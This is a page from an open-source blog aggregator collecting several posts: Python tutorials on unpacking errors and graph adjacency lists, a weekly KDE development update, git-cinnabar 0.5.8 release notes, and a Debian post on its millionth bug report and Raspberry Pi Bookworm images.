ItsMyCode: ValueError: too many values to unpack (expected 2)

Planet Python - Sat, 2021-11-20 08:54

ItsMyCode |

If you get ValueError: too many values to unpack (expected 2), it means that you are trying to access too many values from an iterator. Value Error is a standard exception that can occur if the method receives an argument with the correct data type but an invalid value or if the value provided to the method falls outside the valid range.

In this article, let us look at what this error means and the scenarios you get this error and how to resolve the error with examples.

What is Unpacking in Python?

In Python, the function can return multiple values, and it can be stored in the variable. This is one of the unique features of Python when compared to other languages such as C++, Java, C# etc. 

Unpacking in Python is an operation where an iterable of values will be assigned to a tuple or list of variables.

Unpacking using List in Python

In this example, we are unpacking the list of elements where each element that we return from the list should assign to a variable on the left-hand side to store these elements.

x,y,z = [5,10,15] print(x) print(y) print(z)

Output

5 10 15 Unpacking list using underscore

Underscoring is most commonly used to ignore values; when _ is used as a variable when we do not want to use this variable at a later point.

x,y,_ = [5,10,15] print(x) print(y) print(_)

Output

5 10 15 Unpacking list using an asterisk

The drawback with an underscore is it can just hold one iterable value, but what if you have too many values that comes dynamically? Asterisk comes as a rescue over here. We can use the variable with an asterisk in front to unpack all the values that are not assigned, and it can hold all these elements in it.

x,y, *z = [5,10,15,20,25,30] print(x) print(y) print(z)

Output

5 10 [15, 20, 25, 30] What is ValueError: too many values to unpack (expected 2)?

ValueError: too many values to unpack (expected 2) occurs when there is a mismatch between the returned values and the number of variables declared to store these values. If you have more objects to assign and fewer variables to hold, you get a value error.

The error occurs mainly in 2 scenarios-

Scenario 1: Unpacking the list elements

Let’s take a simple example that returns an iterable of three items instead of two, and we have two variables to hold these items on the left-hand side, and Python will throw ValueError: too many values to unpack.

In the below example we have 2 variables x and y but we are returning 3 iterables elements from list.

Error Scenario x,y =[5,10,15]

Output

Traceback (most recent call last): File "c:/Projects/Tryouts/main.py", line 1, in <module> x,y =[5,10,15] ValueError: too many values to unpack (expected 2) Solution

While unpacking a list into variables, the number of variables you want to unpack must equal the number of items in the list. 

If you already know the number of elements in the list, then ensure you have an equal number of variables on the left-hand side to hold these elements to solve.

If you do not know the number of elements in the list or if your list is dynamic, then you can unpack the list with an asterisk operator. It will ensure that all the un-assigned elements will be stored in a single variable with an asterisk operator.

# In case we know the number of elements # in the list to unpack x,y,z =[5,10,15] print("If we know the number of elements in list") print(x) print(y) print(z) # if the list is dynamic a,b, *c = [5,10,15,20,25,30] print("In case of dynamic list") print(a) print(b) print(c)

Output

If we know the number of elements in list 5 10 15 In case of dynamic list 5 10 [15, 20, 25, 30] Scenario 2: Unpacking dictionary 

In Python, Dictionary is a set of unordered items which holds key-value pairs. Let us consider a simple example of an employee, which consists of three keys, and each holds a value, as shown below.

If we need to extract and print each of the key and value pairs in the employee dictionary, we can use iterate the dictionary elements using a for loop. 

Lets run our code and see what happens

Error Scenarios # Unpacking using dictornary employee= { "name":"Chandler", "age":25, "Salary":10000 } for keys, values in employee: print(keys,values)

Output

Traceback (most recent call last): File "c:/Projects/Tryouts/main.py", line 9, in <module> for keys, values in employee: ValueError: too many values to unpack (expected 2)

We get a Value error in the above code because each item in the “employee” dictionary is a value. We should not consider the keys and values in the dictionary as two separate entities in Python.

Solution

We can resolve the error by using a method called items(). The items() function returns a view object which contains both key-value pairs stored as tuples.

# Unpacking using dictornary employee= { "name":"Chandler", "age":25, "Salary":10000 } for keys, values in employee.items(): print(keys,values)

Output

name Chandler age 25 Salary 10000

Note: If you are using Python 2.x, you need to use iteritems() instead of the items() function. 

The post ValueError: too many values to unpack (expected 2) appeared first on ItsMyCode.

Categories: FLOSS Project Planets

This week in KDE: most of GNOME shell in the Overview effect

Planet KDE - Fri, 2021-11-19 23:11

This week the new KWin Overview effect gained the ability to shows results from KRunner when you search! This brings it fairly close to feature parity with GNOME’s central Activities Overview feature!

At this rate, we’re about halfway to implementing all of GNOME shell in the Overview effect

Thanks to Vlad Zahorodnii for this work, which lands in Plasma 5.24!

Other new Features

Gwenview now has “Print Preview” functionality, which as I’m sure you can imagine would be quite useful in an image viewer app (Alexander Volkov, Gwenview 22.04)

Discover now prevents you from doing anything that would uninstall Plasma in the process, which is probably not what you were intending to do (Aleix Pol Gonzalez, Plasma 5.24):

Hopefully this is Linus-Sebastian-proof Bugfixes & Performance Improvements

When you print an image in Gwenview or Kolourpaint, it now automatically defaults to printing in portrait or landscape mode according to the image’s aspect ratio, rather than making you set this manually (Alexander Volkov, Gwenview 21.12)

Konsole now releases memory when you clear the text (Martin Tobias Holmedahl Sandsmark, Konsole 22.04)

Konsole now has better text display performance (Waqar Ahmed and Tomaz Canabrava, Konsole 22.04)

The Alacritty terminal once again opens with the correct window size (Vlad Zahorodnii, Plasma 5.23.4)

Toolbar buttons in GTK3 apps that don’t use CSD headerbars (such as Inkscape and FileZilla) no longer have unnecessary borders drawn around them (Yaroslav Sidlovsky, Plasma 5.23.4)

The open/save dialogs in Flatpak or Snap apps now remember their previous size when re-opened (Eugene Popov, Plasma 5.23.4)

The “Show in file manager” text in Plasma Vaults is now able to be translated (Nicolas Fella, Plasma 5.23.4)

The Task Manager’s textual list of grouped apps is now much faster and more performant (Fushan Wen, Plasma 5.24)

Discover now eventually stops searching after no further search results are found, instead of always displaying “Still looking” at the bottom (Aleix Pol Gonzalez, Plasma 5.24)

Fixed an issue with playing certain embedded videos in the Plasma Wayland session (Vlad Zahorodnii, Plasma 5.24)

Fixed a major performance issue in QtQuick-based KWin effects for NVIDIA GPU users (David Edmundson, Plasma 5.24)

The new Overview effect is now much faster to activate (Vlad Zahorodnii, Plasma 5.24)

Tons and tons of small bugs with Breeze icons have been fixed–too many to individually list! (Andreas Kainz, Frameworks 5.89)

Fixed a visual glitch with Plasma tooltips flickering when they appear or disappear (Marco Martin, Frameworks 5.89)

Icons and text in Plasma applet tabs are once again centered as intended (Eugene Popov, Frameworks 5.89)

User Interface Improvements

Elisa’s default album icon is now prettier and more semantically appropriate (Andreas Kainz, Elisa 22.04):

The new Overview effect is now touch-friendly (Arjen Hiemstra, Plasma 5.24)

The touchpad applet has been restored after getting removed in Plasma 5.23, and is now back as a read-only status notifier that simply shows visually when the touchpad is disabled, like the caps lock and microphone notifier applets (me: Nate Graham, Plasma 5.23.4):

The weather applet’s location configuration dialog now automatically searches through all available weather sources rather than making you first select some manually (Bharadwaj Raju, Plasma 5.24):

Discover now presents a more user-friendly set of messages when there is an issue installing updates (me: Nate Graham, Plasma 5.24):

This is a simulated error message, of course. But it’s what a normal error message seems like to regular people!

Discover’s search field no longer auto-accepts a few seconds after you stop typing; now it only initiates a search when you explicitly hit the Enter or Return key (me: Nate Graham, Plasma 5.24)

Opening a Plasma Vault and displaying its contents in your file manager now creates a new file manager window for this purpose instead of re-using any existing ones, since this didn’t work with various combinations of activities and virtual desktops and especially when using the “Limit to the selected activities” setting (Ivan Čukić, Plasma 5.24)

…And everything else

Keep in mind that this blog only covers the tip of the iceberg! Tons of KDE apps whose development I don’t have time to follow aren’t represented here, and I also don’t mention backend refactoring, improved test coverage, and other changes that are generally not user-facing. If you’re hungry for more, check out https://planet.kde.org/, where you can find blog posts by other KDE contributors detailing the work they’re doing.

How You Can Help

Have a look at https://community.kde.org/Get_Involved to discover ways to be part of a project that really matters. Each contributor makes a huge difference in KDE; you are not a number or a cog in a machine! You don’t have to already be a programmer, either. I wasn’t when I got started. Try it, you’ll like it! We don’t bite!

Finally, consider making a tax-deductible donation to the KDE e.V. foundation.

Categories: FLOSS Project Planets

Mike Hommey: Announcing git-cinnabar 0.5.8

Planet Debian - Fri, 2021-11-19 17:05

Git-cinnabar is a git remote helper to interact with mercurial repositories. It allows to clone, pull and push from/to mercurial remote repositories, using git.

Get it on github.

These release notes are also available on the git-cinnabar wiki.

What’s new since 0.5.7?
  • Updated git to 2.34.0 for the helper.
  • Python 3.5 and newer are now officially supported. Git-cinnabar will try to use the python3 program by default, but will fallback to python2.7 if that’s where the Mercurial libraries are available. It is possible to pick a specific python with the GIT_CINNABAR_PYTHON environment variable.
  • Fixed compatibility with Mercurial 5.8 and newer.
  • The prebuilt binaries are now optimized on arm64 macOS and Windows.
  • git cinnabar download now properly returns an error code when failing to extract the prebuilt binaries.
  • Pushing to a non-empty Mercurial repository without having pulled at least once from it is now prevented.
  • Replaced the nagging about fsck with a smaller check always happening after pulling.
  • Fail earlier on git fetch hg::url <sha1> (it would properly fetch the Mercurial changeset and its ancestors, but git would fail at the end because the sha1 is not a git sha1 ; use git cinnabar fetch instead)
  • Minor fixes.
Categories: FLOSS Project Planets

Gunnar Wolf: For our millionth bug, bookworms eat raspberries alive

Planet Debian - Fri, 2021-11-19 10:37

I guess you already heard, right? The Debian Bug Tracking System has hit a big milestone! We just passed our one millionth bug report! (and yes, that’s a cause for celebration; bug reporting is probably the best way for the system to grow and improve)

So, to celebrate, I want to announce I have nudged our unofficial Raspberry Pi images build scripts to now also build images for our upcoming Debian release, Debian 12 «Bookworm»

(image above: A bookworm learns about raspberries in various stages of testing. Image sources: Transformers Wiki, CC BY-SA and Sam Saunders at Flickr, CC BY-SA)

So… Get’em while they are fresh! https://raspi.debian.net/! And enjoy the following (non-book)worm-on-a-raspberry picture from Wikimedia Commons:

Oh, FWIW – The site still shows images for Buster. You will notice they are no longer being autobuilt (why spend CPU time in something that’s no longer going to change significatively?). The Bookworm images are not yet tested; as soon as I can test them, I will drop the Buster ones.

Categories: FLOSS Project Planets

Python for Beginners: Graph in Python

Planet Python - Fri, 2021-11-19 09:26

Graphs are one of the most important data structures. Graphs are used to represent telephone networks, maps, social network connections, etc. In this article we will discuss what a graph is and how we can implement a graph in Python.

What is a graph?

In mathematics, A graph is defined as a set of vertices and edges where vertices are particular objects and edges represent the connections between the vertices. The vertices and edges are represented by using sets. 

Mathematically, a graph G can be represented as G= (V , E), where V is the set of vertices and E is the set of edges.

If an edge Ei connects vertices v1 and v2, we can represent the edge as Ei= (v1, v2).

How to represent a graph?

We will use the graph given in the following figure to learn how to represent a graph.

Graph in Python

To represent a graph, we will have to find the set of vertices and edges in the graph. 

First, we will find the set of vertices. For this, we can create a set using the vertices given in the above figure. In the figure, the vertices have been named A,B,C,D,E, and F. So the set of vertices can be created as V={A, B, C, D, E, F}. 

To find the set of edges, first we will find all the edges in the graph. You can observe that there are 6 edges in the graph numbered from E1 to E6. An edge Ei can be created as a tuple (v1, v2) where v1 and v2 are the vertices being connected by Ei. For the above graph, We can represent the edges as follows.

  • E1=(A, D) 
  • E2 = (A,B)
  • E3= (A,E)
  • E4=(A, F)
  • E5=(B,F)
  • E6= (B,C)

The set of edges E can be represented as E= {E1, E2 , E3, E4, E5, E6}.

Finally, the graph G can be represented as G= (V,E) where V and E are sets of vertices and edges.

Till now, we have discussed how to represent a graph mathematically. Can you think of a way to represent a graph in a python program? Let us look into it.

How to represent a graph in Python?

We can represent a graph using an adjacency list. An adjacency list can be thought of as a list in which each vertex stores a list of all the vertices connected to it. 

We will implement the adjacency list representation of the graph in python using a dictionary and lists. 

First, we will create a python dictionary with all the vertex names as keys and an empty list (adjacency list) as their associated values using the given set of vertices.

After that, we will use the given set of edges to complete the adjacency list of each vertex that has been represented using the keys of the dictionary. For every edge (v1,v2), we will add v1 to the adjacency list of v2 and v2 to the adjacency list of v1. 

In this way, every key (vertex) in the dictionary will have an associated value (a list of vertices) and the dictionary will represent the whole graph in python. 

Given the set of vertices and edges, we can implement a graph in python as follows.

vertices = {"A", "B", "C", "D", "E", "F"} edges = {("A", "D"), ("A", "B"), ("A", "E"), ("A", "F"), ("B", "F"), ("B", "C")} graph = dict() for vertex in vertices: graph[vertex] = [] for edge in edges: v1 = edge[0] v2 = edge[1] graph[v1].append(v2) graph[v2].append(v1) print("The given set of vertices is:", vertices) print("The given set of edges is:", edges) print("Graph representation in python is:") print(graph)

Output:

The given set of vertices is: {'F', 'D', 'B', 'E', 'A', 'C'} The given set of edges is: {('A', 'F'), ('A', 'B'), ('B', 'C'), ('A', 'D'), ('A', 'E'), ('B', 'F')} Graph representation in python is: {'F': ['A', 'B'], 'D': ['A'], 'B': ['A', 'C', 'F'], 'E': ['A'], 'A': ['F', 'B', 'D', 'E'], 'C': ['B']}

In the above output, you can verify that each key of the graph has a list of vertices that are connected to it as its value.

Conclusion

In this article, we have discussed graph data structure. We also discussed the mathematical representation of a graph and how we can implement it in python. To learn more about data structures in Python, you can read this article on Linked list in python.

The post Graph in Python appeared first on PythonForBeginners.com.

Categories: FLOSS Project Planets

Pages